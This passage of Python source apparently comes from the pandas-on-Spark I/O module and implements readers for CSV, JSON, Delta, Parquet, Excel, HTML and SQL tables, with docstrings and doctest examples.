length-1 comment characters supported\")\n reader.option(\"comment\", comment)\n\n reader.options(**options)\n\n if encoding is not None:\n reader.option(\"encoding\", encoding_mapping.get(encoding, encoding))\n\n column_labels: Dict[Any, str]\n if isinstance(names, str):\n sdf = reader.schema(names).csv(path)\n column_labels = {col: col for col in sdf.columns}\n else:\n sdf = reader.csv(path)\n if is_list_like(names):\n names = list(names)\n if len(set(names)) != len(names):\n raise ValueError(\"Found non-unique column index\")\n if len(names) != len(sdf.columns):\n raise ValueError(\n \"The number of names [%s] does not match the number \"\n \"of columns [%d]. Try names by a Spark SQL DDL-formatted \"\n \"string.\" % (len(sdf.schema), len(names))\n )\n column_labels = dict(zip(names, sdf.columns))\n elif header is None:\n column_labels = dict(enumerate(sdf.columns))\n else:\n column_labels = {col: col for col in sdf.columns}\n\n if usecols is not None:\n missing: List[Union[int, str]]\n if callable(usecols):\n column_labels = {\n label: col for label, col in column_labels.items() if usecols(label)\n }\n missing = []\n elif all(isinstance(col, int) for col in usecols):\n usecols_ints = cast(List[int], usecols)\n new_column_labels = {\n label: col\n for i, (label, col) in enumerate(column_labels.items())\n if i in usecols_ints\n }\n missing = [\n col\n for col in usecols_ints\n if (\n col >= len(column_labels)\n or list(column_labels)[col] not in new_column_labels\n )\n ]\n column_labels = new_column_labels\n elif all(isinstance(col, str) for col in usecols):\n new_column_labels = {\n label: col for label, col in column_labels.items() if label in usecols\n }\n missing = [col for col in usecols if col not in new_column_labels]\n column_labels = new_column_labels\n else:\n raise ValueError(\n \"'usecols' must either be list-like of all strings, \"\n \"all unicode, all integers or a callable.\"\n )\n if len(missing) > 0:\n raise ValueError(\n \"Usecols do not match columns, columns expected but not \" \"found: %s\" % missing\n )\n\n if len(column_labels) > 0:\n sdf = sdf.select([scol_for(sdf, col) for col in column_labels.values()])\n else:\n sdf = default_session().createDataFrame([], schema=StructType())\n else:\n sdf = default_session().createDataFrame([], schema=StructType())\n column_labels = {}\n\n if nrows is not None:\n sdf = sdf.limit(nrows)\n\n index_spark_column_names: List[str]\n index_names: List[Label]\n if index_col is not None:\n if isinstance(index_col, (str, int)):\n index_col = [index_col]\n for col in index_col:\n if col not in column_labels:\n raise KeyError(col)\n index_spark_column_names = [column_labels[col] for col in index_col]\n index_names = [(col,) for col in index_col]\n column_labels = {\n label: col for label, col in column_labels.items() if label not in index_col\n }\n else:\n log_advice(\n \"If `index_col` is not specified for `read_csv`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n index_spark_column_names = []\n index_names = []\n\n psdf: DataFrame = DataFrame(\n InternalFrame(\n spark_frame=sdf,\n index_spark_columns=[scol_for(sdf, col) for col in index_spark_column_names],\n index_names=index_names,\n column_labels=[\n label if is_name_like_tuple(label) else (label,) for label in column_labels\n ],\n data_spark_columns=[scol_for(sdf, col) for col in column_labels.values()],\n )\n )\n\n if dtype is not None:\n if isinstance(dtype, dict):\n for col, tpe in dtype.items():\n psdf[col] = psdf[col].astype(tpe)\n else:\n for col in psdf.columns:\n psdf[col] = psdf[col].astype(dtype)\n\n return psdf\n\n\ndef read_json(\n path: str, lines: bool = True, index_col: Optional[Union[str, List[str]]] = None, **options: Any\n) -> DataFrame:\n \"\"\"\n Convert a JSON string to DataFrame.\n\n Parameters\n ----------\n path : string\n File path\n lines : bool, default True\n Read the file as a JSON object per line. It should be always True for now.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n Examples\n --------\n >>> df = ps.DataFrame([['a', 'b'], ['c', 'd']],\n ... columns=['col 1', 'col 2'])\n\n >>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1)\n >>> ps.read_json(\n ... path=r'%s/read_json/foo.json' % path\n ... ).sort_values(by=\"col 1\")\n col 1 col 2\n 0 a b\n 1 c d\n\n >>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1, lineSep='___')\n >>> ps.read_json(\n ... path=r'%s/read_json/foo.json' % path, lineSep='___'\n ... ).sort_values(by=\"col 1\")\n col 1 col 2\n 0 a b\n 1 c d\n\n You can preserve the index in the roundtrip as below.\n\n >>> df.to_json(path=r'%s/read_json/bar.json' % path, num_files=1, index_col=\"index\")\n >>> ps.read_json(\n ... path=r'%s/read_json/bar.json' % path, index_col=\"index\"\n ... ).sort_values(by=\"col 1\") # doctest: +NORMALIZE_WHITESPACE\n col 1 col 2\n index\n 0 a b\n 1 c d\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_json`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if not lines:\n raise NotImplementedError(\"lines=False is not implemented yet.\")\n\n return read_spark_io(path, format=\"json\", index_col=index_col, **options)\n\n\ndef read_delta(\n path: str,\n version: Optional[str] = None,\n timestamp: Optional[str] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read a Delta Lake table on some file system and return a DataFrame.\n\n If the Delta Lake table is already stored in the catalog (aka the metastore), use 'read_table'.\n\n Parameters\n ----------\n path : string\n Path to the Delta Lake table.\n version : string, optional\n Specifies the table version (based on Delta's internal transaction version) to read from,\n using Delta's time travel feature. This sets Delta's 'versionAsOf' option. Note that\n this parameter and `timestamp` parameter cannot be used together, otherwise it will raise a\n `ValueError`.\n timestamp : string, optional\n Specifies the table version (based on timestamp) to read from,\n using Delta's time travel feature. This must be a valid date or timestamp string in Spark,\n and sets Delta's 'timestampAsOf' option. Note that this parameter and `version` parameter\n cannot be used together, otherwise it will raise a `ValueError`.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options\n Additional options that can be passed onto Delta.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_delta\n read_table\n read_spark_io\n read_parquet\n\n Examples\n --------\n >>> ps.range(1).to_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n id\n 0 0\n\n >>> ps.range(10, 15, num_partitions=1).to_delta('%s/read_delta/foo' % path,\n ... mode='overwrite') # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n id\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n\n >>> ps.read_delta('%s/read_delta/foo' % path, version=0) # doctest: +SKIP\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(10, 15, num_partitions=1).to_delta(\n ... '%s/read_delta/bar' % path, index_col=\"index\") # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/bar' % path, index_col=\"index\") # doctest: +SKIP\n id\n index\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_delta`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n if version is not None and timestamp is not None:\n raise ValueError(\"version and timestamp cannot be used together.\")\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if version is not None:\n options[\"versionAsOf\"] = version\n if timestamp is not None:\n options[\"timestampAsOf\"] = timestamp\n return read_spark_io(path, format=\"delta\", index_col=index_col, **options)\n\n\ndef read_table(name: str, index_col: Optional[Union[str, List[str]]] = None) -> DataFrame:\n \"\"\"\n Read a Spark table and return a DataFrame.\n\n Parameters\n ----------\n name : string\n Table name in Spark.\n\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_table\n read_delta\n read_parquet\n read_spark_io\n\n Examples\n --------\n >>> ps.range(1).to_table('%s.my_table' % db)\n >>> ps.read_table('%s.my_table' % db)\n id\n 0 0\n\n >>> ps.range(1).to_table('%s.my_table' % db, index_col=\"index\")\n >>> ps.read_table('%s.my_table' % db, index_col=\"index\") # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 0\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_table`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n sdf = default_session().read.table(name)\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\ndef read_spark_io(\n path: Optional[str] = None,\n format: Optional[str] = None,\n schema: Union[str, \"StructType\"] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"Load a DataFrame from a Spark data source.\n\n Parameters\n ----------\n path : string, optional\n Path to the data source.\n format : string, optional\n Specifies the output data source format. Some common ones are:\n\n - 'delta'\n - 'parquet'\n - 'orc'\n - 'json'\n - 'csv'\n schema : string or StructType, optional\n Input schema. If none, Spark tries to infer the schema automatically.\n The schema can either be a Spark StructType, or a DDL-formatted string like\n `col0 INT, col1 DOUBLE`.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n See Also\n --------\n DataFrame.to_spark_io\n DataFrame.read_table\n DataFrame.read_delta\n DataFrame.read_parquet\n\n Examples\n --------\n >>> ps.range(1).to_spark_io('%s/read_spark_io/data.parquet' % path)\n >>> ps.read_spark_io(\n ... '%s/read_spark_io/data.parquet' % path, format='parquet', schema='id long')\n id\n 0 0\n\n >>> ps.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.json' % path,\n ... format='json', lineSep='__')\n >>> ps.read_spark_io(\n ... '%s/read_spark_io/data.json' % path, format='json', schema='id long', lineSep='__')\n id\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.orc' % path,\n ... format='orc', index_col=\"index\")\n >>> ps.read_spark_io(\n ... path=r'%s/read_spark_io/data.orc' % path, format=\"orc\", index_col=\"index\")\n ... # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n sdf = default_session().read.load(path=path, format=format, schema=schema, **options)\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\ndef read_parquet(\n path: str,\n columns: Optional[List[str]] = None,\n index_col: Optional[List[str]] = None,\n pandas_metadata: bool = False,\n **options: Any,\n) -> DataFrame:\n \"\"\"Load a parquet object from the file path, returning a DataFrame.\n\n Parameters\n ----------\n path : string\n File path\n columns : list, default=None\n If not None, only these columns will be read from the file.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n pandas_metadata : bool, default: False\n If True, try to respect the metadata if the Parquet file is written from pandas.\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_parquet\n DataFrame.read_table\n DataFrame.read_delta\n DataFrame.read_spark_io\n\n Examples\n --------\n >>> ps.range(1).to_parquet('%s/read_spark_io/data.parquet' % path)\n >>> ps.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'])\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(1).to_parquet('%s/read_spark_io/data.parquet' % path, index_col=\"index\")\n >>> ps.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'], index_col=\"index\")\n ... # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 0\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_parquet`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if columns is not None:\n columns = list(columns)\n\n index_names = None\n\n if index_col is None and pandas_metadata:\n # Try to read pandas metadata\n\n @pandas_udf( # type: ignore[call-overload]\n \"index_col array, index_names array\"\n )\n def read_index_metadata(pser: pd.Series) -> pd.DataFrame:\n binary = pser.iloc[0]\n metadata = pq.ParquetFile(pa.BufferReader(binary)).metadata.metadata\n if b\"pandas\" in metadata:\n pandas_metadata = json.loads(metadata[b\"pandas\"].decode(\"utf8\"))\n if all(isinstance(col, str) for col in pandas_metadata[\"index_columns\"]):\n index_col = []\n index_names = []\n for col in pandas_metadata[\"index_columns\"]:\n index_col.append(col)\n for column in pandas_metadata[\"columns\"]:\n if column[\"field_name\"] == col:\n index_names.append(column[\"name\"])\n break\n else:\n index_names.append(None)\n return pd.DataFrame({\"index_col\": [index_col], \"index_names\": [index_names]})\n return pd.DataFrame({\"index_col\": [None], \"index_names\": [None]})\n\n index_col, index_names = (\n default_session()\n .read.format(\"binaryFile\")\n .load(path)\n .limit(1)\n .select(read_index_metadata(\"content\").alias(\"index_metadata\"))\n .select(\"index_metadata.*\")\n .head()\n )\n\n psdf = read_spark_io(path=path, format=\"parquet\", options=options, index_col=index_col)\n\n if columns is not None:\n new_columns = [c for c in columns if c in psdf.columns]\n if len(new_columns) > 0:\n psdf = psdf[new_columns]\n else:\n sdf = default_session().createDataFrame([], schema=StructType())\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n psdf = DataFrame(\n InternalFrame(\n spark_frame=sdf,\n index_spark_columns=index_spark_columns,\n index_names=index_names,\n )\n )\n\n if index_names is not None:\n psdf.index.names = index_names\n\n return psdf\n\n\ndef read_clipboard(sep: str = r\"\\s+\", **kwargs: Any) -> DataFrame:\n r\"\"\"\n Read text from clipboard and pass to read_csv. See read_csv for the\n full argument list\n\n Parameters\n ----------\n sep : str, default '\\s+'\n A string or regex delimiter. The default of '\\s+' denotes\n one or more whitespace characters.\n\n See Also\n --------\n DataFrame.to_clipboard : Write text out to clipboard.\n\n Returns\n -------\n parsed : DataFrame\n \"\"\"\n return cast(DataFrame, from_pandas(pd.read_clipboard(sep, **kwargs)))\n\n\ndef read_excel(\n io: Union[str, Any],\n sheet_name: Union[str, int, List[Union[str, int]], None] = 0,\n header: Union[int, List[int]] = 0,\n names: Optional[List] = None,\n index_col: Optional[List[int]] = None,\n usecols: Optional[Union[int, str, List[Union[int, str]], Callable[[str], bool]]] = None,\n dtype: Optional[Dict[str, Union[str, Dtype]]] = None,\n engine: Optional[str] = None,\n converters: Optional[Dict] = None,\n true_values: Optional[Any] = None,\n false_values: Optional[Any] = None,\n skiprows: Optional[Union[int, List[int]]] = None,\n nrows: Optional[int] = None,\n na_values: Optional[Any] = None,\n keep_default_na: bool = True,\n verbose: bool = False,\n parse_dates: Union[bool, List, Dict] = False,\n date_parser: Optional[Callable] = None,\n thousands: Optional[str] = None,\n comment: Optional[str] = None,\n skipfooter: int = 0,\n convert_float: bool = True,\n mangle_dupe_cols: bool = True,\n **kwds: Any,\n) -> Union[DataFrame, Series, Dict[str, Union[DataFrame, Series]]]:\n \"\"\"\n Read an Excel file into a pandas-on-Spark DataFrame or Series.\n\n Support both `xls` and `xlsx` file extensions from a local filesystem or URL.\n Support an option to read a single sheet or a list of sheets.\n\n Parameters\n ----------\n io : str, file descriptor, pathlib.Path, ExcelFile or xlrd.Book\n The string could be a URL. The value URL must be available in Spark's DataFrameReader.\n\n .. note::\n If the underlying Spark is below 3.0, the parameter as a string is not supported.\n You can use `ps.from_pandas(pd.read_excel(...))` as a workaround.\n\n sheet_name : str, int, list, or None, default 0\n Strings are used for sheet names. Integers are used in zero-indexed\n sheet positions. Lists of strings/integers are used to request\n multiple sheets. Specify None to get all sheets.\n\n Available cases:\n\n * Defaults to ``0``: 1st sheet as a `DataFrame`\n * ``1``: 2nd sheet as a `DataFrame`\n * ``\"Sheet1\"``: Load sheet with name \"Sheet1\"\n * ``[0, 1, \"Sheet5\"]``: Load first, second and sheet named \"Sheet5\"\n as a dict of `DataFrame`\n * None: All sheets.\n\n header : int, list of int, default 0\n Row (0-indexed) to use for the column labels of the parsed\n DataFrame. If a list of integers is passed those row positions will\n be combined into a ``MultiIndex``. Use None if there is no header.\n names : array-like, default None\n List of column names to use. If file contains no header row,\n then you should explicitly pass header=None.\n index_col : int, list of int, default None\n Column (0-indexed) to use as the row labels of the DataFrame.\n Pass None if there is no such column. If a list is passed,\n those columns will be combined into a ``MultiIndex``. If a\n subset of data is selected with ``usecols``, index_col\n is based on the subset.\n usecols : int, str, list-like, or callable default None\n Return a subset of the columns.\n\n * If None, then parse all columns.\n * If str, then indicates comma separated list of Excel column letters\n and column ranges (e.g. \"A:E\" or \"A,C,E:F\"). Ranges are inclusive of\n both sides.\n * If list of int, then indicates list of column numbers to be parsed.\n * If list of string, then indicates list of column names to be parsed.\n * If callable, then evaluate each column name against it and parse the\n column if the callable returns ``True``.\n dtype : Type name or dict of column -> type, default None\n Data type for data or columns. E.g. {'a': np.float64, 'b': np.int32}\n Use `object` to preserve data as stored in Excel and not interpret dtype.\n If converters are specified, they will be applied INSTEAD\n of dtype conversion.\n engine : str, default None\n If io is not a buffer or path, this must be set to identify io.\n Acceptable values are None or xlrd.\n converters : dict, default None\n Dict of functions for converting values in certain columns. Keys can\n either be integers or column labels, values are functions that take one\n input argument, the Excel cell content, and return the transformed\n content.\n true_values : list, default None\n Values to consider as True.\n false_values : list, default None\n Values to consider as False.\n skiprows : list-like\n Rows to skip at the beginning (0-indexed).\n nrows : int, default None\n Number of rows to parse.\n na_values : scalar, str, list-like, or dict, default None\n Additional strings to recognize as NA/NaN. If dict passed, specific\n per-column NA values. By default the following values are interpreted\n as NaN.\n keep_default_na : bool, default True\n If na_values are specified and keep_default_na is False the default NaN\n values are overridden, otherwise they're appended to.\n verbose : bool, default False\n Indicate number of NA values placed in non-numeric columns.\n parse_dates : bool, list-like, or dict, default False\n The behavior is as follows:\n\n * bool. If True -> try parsing the index.\n * list of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3\n each as a separate date column.\n * list of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as\n a single date column.\n * dict, e.g. {{'foo' : [1, 3]}} -> parse columns 1, 3 as date and call\n result 'foo'\n\n If a column or index contains an unparseable date, the entire column or\n index will be returned unaltered as an object data type. For non-standard\n datetime parsing, use ``pd.to_datetime`` after ``pd.read_csv``\n\n Note: A fast-path exists for iso8601-formatted dates.\n date_parser : function, optional\n Function to use for converting a sequence of string columns to an array of\n datetime instances. The default uses ``dateutil.parser.parser`` to do the\n conversion. pandas-on-Spark will try to call `date_parser` in three different ways,\n advancing to the next if an exception occurs: 1) Pass one or more arrays\n (as defined by `parse_dates`) as arguments; 2) concatenate (row-wise) the\n string values from the columns defined by `parse_dates` into a single array\n and pass that; and 3) call `date_parser` once for each row using one or\n more strings (corresponding to the columns defined by `parse_dates`) as\n arguments.\n thousands : str, default None\n Thousands separator for parsing string columns to numeric. Note that\n this parameter is only necessary for columns stored as TEXT in Excel,\n any numeric columns will automatically be parsed, regardless of display\n format.\n comment : str, default None\n Comments out remainder of line. Pass a character or characters to this\n argument to indicate comments in the input file. Any data between the\n comment string and the end of the current line is ignored.\n skipfooter : int, default 0\n Rows at the end to skip (0-indexed).\n convert_float : bool, default True\n Convert integral floats to int (i.e., 1.0 --> 1). If False, all numeric\n data will be read in as floats: Excel stores all numbers as floats\n internally.\n\n .. deprecated:: 3.4.0\n\n mangle_dupe_cols : bool, default True\n Duplicate columns will be specified as 'X', 'X.1', ...'X.N', rather than\n 'X'...'X'. Passing in False will cause data to be overwritten if there\n are duplicate names in the columns.\n\n .. deprecated:: 3.4.0\n\n **kwds : optional\n Optional keyword arguments can be passed to ``TextFileReader``.\n\n Returns\n -------\n DataFrame or dict of DataFrames\n DataFrame from the passed in Excel file. See notes in sheet_name\n argument for more information on when a dict of DataFrames is returned.\n\n See Also\n --------\n DataFrame.to_excel : Write DataFrame to an Excel file.\n DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.\n read_csv : Read a comma-separated values (csv) file into DataFrame.\n\n Examples\n --------\n The file can be read using the file name as string or an open file object:\n\n >>> ps.read_excel('tmp.xlsx', index_col=0) # doctest: +SKIP\n Name Value\n 0 string1 1\n 1 string2 2\n 2 #Comment 3\n\n >>> ps.read_excel(open('tmp.xlsx', 'rb'),\n ... sheet_name='Sheet3') # doctest: +SKIP\n Unnamed: 0 Name Value\n 0 0 string1 1\n 1 1 string2 2\n 2 2 #Comment 3\n\n Index and header can be specified via the `index_col` and `header` arguments\n\n >>> ps.read_excel('tmp.xlsx', index_col=None, header=None) # doctest: +SKIP\n 0 1 2\n 0 NaN Name Value\n 1 0.0 string1 1\n 2 1.0 string2 2\n 3 2.0 #Comment 3\n\n Column types are inferred but can be explicitly specified\n\n >>> ps.read_excel('tmp.xlsx', index_col=0,\n ... dtype={'Name': str, 'Value': float}) # doctest: +SKIP\n Name Value\n 0 string1 1.0\n 1 string2 2.0\n 2 #Comment 3.0\n\n True, False, and NA values, and thousands separators have defaults,\n but can be explicitly specified, too. Supply the values you would like\n as strings or lists of strings!\n\n >>> ps.read_excel('tmp.xlsx', index_col=0,\n ... na_values=['string1', 'string2']) # doctest: +SKIP\n Name Value\n 0 None 1\n 1 None 2\n 2 #Comment 3\n\n Comment lines in the excel input file can be skipped using the `comment` kwarg\n\n >>> ps.read_excel('tmp.xlsx', index_col=0, comment='#') # doctest: +SKIP\n Name Value\n 0 string1 1.0\n 1 string2 2.0\n 2 None NaN\n \"\"\"\n\n def pd_read_excel(\n io_or_bin: Any, sn: Union[str, int, List[Union[str, int]], None]\n ) -> pd.DataFrame:\n return pd.read_excel(\n io=BytesIO(io_or_bin) if isinstance(io_or_bin, (bytes, bytearray)) else io_or_bin,\n sheet_name=sn,\n header=header,\n names=names,\n index_col=index_col,\n usecols=usecols,\n dtype=dtype,\n engine=engine,\n converters=converters,\n true_values=true_values,\n false_values=false_values,\n skiprows=skiprows,\n nrows=nrows,\n na_values=na_values,\n keep_default_na=keep_default_na,\n verbose=verbose,\n parse_dates=parse_dates, # type: ignore[arg-type]\n date_parser=date_parser,\n thousands=thousands,\n comment=comment,\n skipfooter=skipfooter,\n convert_float=convert_float,\n mangle_dupe_cols=mangle_dupe_cols,\n **kwds,\n )\n\n if isinstance(io, str):\n # 'binaryFile' format is available since Spark 3.0.0.\n binaries = default_session().read.format(\"binaryFile\").load(io).select(\"content\").head(2)\n io_or_bin = binaries[0][0]\n single_file = len(binaries) == 1\n else:\n io_or_bin = io\n single_file = True\n\n pdf_or_psers = pd_read_excel(io_or_bin, sn=sheet_name)\n\n if single_file:\n if isinstance(pdf_or_psers, dict):\n return {\n sn: cast(Union[DataFrame, Series], from_pandas(pdf_or_pser))\n for sn, pdf_or_pser in pdf_or_psers.items()\n }\n else:\n return cast(Union[DataFrame, Series], from_pandas(pdf_or_psers))\n else:\n\n def read_excel_on_spark(\n pdf_or_pser: Union[pd.DataFrame, pd.Series],\n sn: Union[str, int, List[Union[str, int]], None],\n ) -> Union[DataFrame, Series]:\n if isinstance(pdf_or_pser, pd.Series):\n pdf = pdf_or_pser.to_frame()\n else:\n pdf = pdf_or_pser\n\n psdf = cast(DataFrame, from_pandas(pdf))\n return_schema = force_decimal_precision_scale(\n as_nullable_spark_type(psdf._internal.spark_frame.drop(*HIDDEN_COLUMNS).schema)\n )\n\n def output_func(pdf: pd.DataFrame) -> pd.DataFrame:\n pdf = pd.concat([pd_read_excel(bin, sn=sn) for bin in pdf[pdf.columns[0]]])\n\n reset_index = pdf.reset_index()\n for name, col in reset_index.items():\n dt = col.dtype\n if is_datetime64_dtype(dt) or is_datetime64tz_dtype(dt):\n continue\n reset_index[name] = col.replace({np.nan: None})\n pdf = reset_index\n\n # Just positionally map the column names to given schema's.\n return pdf.rename(columns=dict(zip(pdf.columns, return_schema.names)))\n\n sdf = (\n default_session()\n .read.format(\"binaryFile\")\n .load(io)\n .select(\"content\")\n .mapInPandas(lambda iterator: map(output_func, iterator), schema=return_schema)\n )\n\n return DataFrame(psdf._internal.with_new_sdf(sdf))\n\n if isinstance(pdf_or_psers, dict):\n return {\n sn: read_excel_on_spark(pdf_or_pser, sn) for sn, pdf_or_pser in pdf_or_psers.items()\n }\n else:\n return read_excel_on_spark(pdf_or_psers, sheet_name)\n\n\ndef read_html(\n io: Union[str, Any],\n match: str = \".+\",\n flavor: Optional[str] = None,\n header: Optional[Union[int, List[int]]] = None,\n index_col: Optional[Union[int, List[int]]] = None,\n skiprows: Optional[Union[int, List[int], slice]] = None,\n attrs: Optional[Dict[str, str]] = None,\n parse_dates: bool = False,\n thousands: str = \",\",\n encoding: Optional[str] = None,\n decimal: str = \".\",\n converters: Optional[Dict] = None,\n na_values: Optional[Any] = None,\n keep_default_na: bool = True,\n displayed_only: bool = True,\n) -> List[DataFrame]:\n r\"\"\"Read HTML tables into a ``list`` of ``DataFrame`` objects.\n\n Parameters\n ----------\n io : str or file-like\n A URL, a file-like object, or a raw string containing HTML. Note that\n lxml only accepts the http, FTP and file URL protocols. If you have a\n URL that starts with ``'https'`` you might try removing the ``'s'``.\n\n match : str or compiled regular expression, optional\n The set of tables containing text matching this regex or string will be\n returned. Unless the HTML is extremely simple you will probably need to\n pass a non-empty string here. Defaults to '.+' (match any non-empty\n string). The default value will return all tables contained on a page.\n This value is converted to a regular expression so that there is\n consistent behavior between Beautiful Soup and lxml.\n\n flavor : str or None, container of strings\n The parsing engine to use. 'bs4' and 'html5lib' are synonymous with\n each other, they are both there for backwards compatibility. The\n default of ``None`` tries to use ``lxml`` to parse and if that fails it\n falls back on ``bs4`` + ``html5lib``.\n\n header : int or list-like or None, optional\n The row (or list of rows for a :class:`~ps.MultiIndex`) to use to\n make the columns headers.\n\n index_col : int or list-like or None, optional\n The column (or list of columns) to use to create the index.\n\n skiprows : int or list-like or slice or None, optional\n 0-based. Number of rows to skip after parsing the column integer. If a\n sequence of integers or a slice is given, will skip the rows indexed by\n that sequence. Note that a single element sequence means 'skip the nth\n row' whereas an integer means 'skip n rows'.\n\n attrs : dict or None, optional\n This is a dictionary of attributes that you can pass to use to identify\n the table in the HTML. These are not checked for validity before being\n passed to lxml or Beautiful Soup. However, these attributes must be\n valid HTML table attributes to work correctly. For example, ::\n\n attrs = {'id': 'table'}\n\n is a valid attribute dictionary because the 'id' HTML tag attribute is\n a valid HTML attribute for *any* HTML tag as per `this document\n `__. ::\n\n attrs = {'asdf': 'table'}\n\n is *not* a valid attribute dictionary because 'asdf' is not a valid\n HTML attribute even if it is a valid XML attribute. Valid HTML 4.01\n table attributes can be found `here\n `__. A\n working draft of the HTML 5 spec can be found `here\n `__. It contains the\n latest information on table attributes for the modern web.\n\n parse_dates : bool, optional\n See :func:`~ps.read_csv` for more details.\n\n thousands : str, optional\n Separator to use to parse thousands. Defaults to ``','``.\n\n encoding : str or None, optional\n The encoding used to decode the web page. Defaults to ``None``.``None``\n preserves the previous encoding behavior, which depends on the\n underlying parser library (e.g., the parser library will try to use\n the encoding provided by the document).\n\n decimal : str, default '.'\n Character to recognize as decimal point (example: use ',' for European\n data).\n\n converters : dict, default None\n Dict of functions for converting values in certain columns. Keys can\n either be integers or column labels, values are functions that take one\n input argument, the cell (not column) content, and return the\n transformed content.\n\n na_values : iterable, default None\n Custom NA values\n\n keep_default_na : bool, default True\n If na_values are specified and keep_default_na is False the default NaN\n values are overridden, otherwise they're appended to\n\n displayed_only : bool, default True\n Whether elements with \"display: none\" should be parsed\n\n Returns\n -------\n dfs : list of DataFrames\n\n See Also\n --------\n read_csv\n DataFrame.to_html\n \"\"\"\n pdfs = pd.read_html(\n io=io,\n match=match,\n flavor=flavor,\n header=header,\n index_col=index_col,\n skiprows=skiprows,\n attrs=attrs,\n parse_dates=parse_dates,\n thousands=thousands,\n encoding=encoding,\n decimal=decimal,\n converters=converters,\n na_values=na_values,\n keep_default_na=keep_default_na,\n displayed_only=displayed_only,\n )\n return cast(List[DataFrame], [from_pandas(pdf) for pdf in pdfs])\n\n\n# TODO: add `coerce_float` and 'parse_dates' parameters\ndef read_sql_table(\n table_name: str,\n con: str,\n schema: Optional[str] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n columns: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read SQL database table into a DataFrame.\n\n Given a table name and a JDBC URI, returns a DataFrame.\n\n Parameters\n ----------\n table_name : str\n Name of SQL table in database.\n con : str\n A JDBC URI could be provided as str.\n\n .. note:: The URI must be JDBC URI instead of Python's database URI.\n\n schema : str, default None\n Name of SQL schema in database to query (if database flavor\n supports this). Uses default schema if None (default).\n index_col : str or list of str, optional, default: None\n Column(s) to set as index(MultiIndex).\n columns : list, default None\n List of column names to select from SQL table.\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n A SQL table is returned as two-dimensional data structure with labeled\n axes.\n\n See Also\n --------\n read_sql_query : Read SQL query into a DataFrame.\n read_sql : Read SQL query or database table into a DataFrame.\n\n Examples\n --------\n >>> ps.read_sql_table('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n reader = default_session().read\n reader.option(\"dbtable\", table_name)\n reader.option(\"url\", con)\n if schema is not None:\n reader.schema(schema)\n reader.options(**options)\n sdf = reader.format(\"jdbc\").load()\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n psdf: DataFrame = DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n if columns is not None:\n if isinstance(columns, str):\n columns = [columns]\n psdf = psdf[columns]\n return psdf\n\n\n# 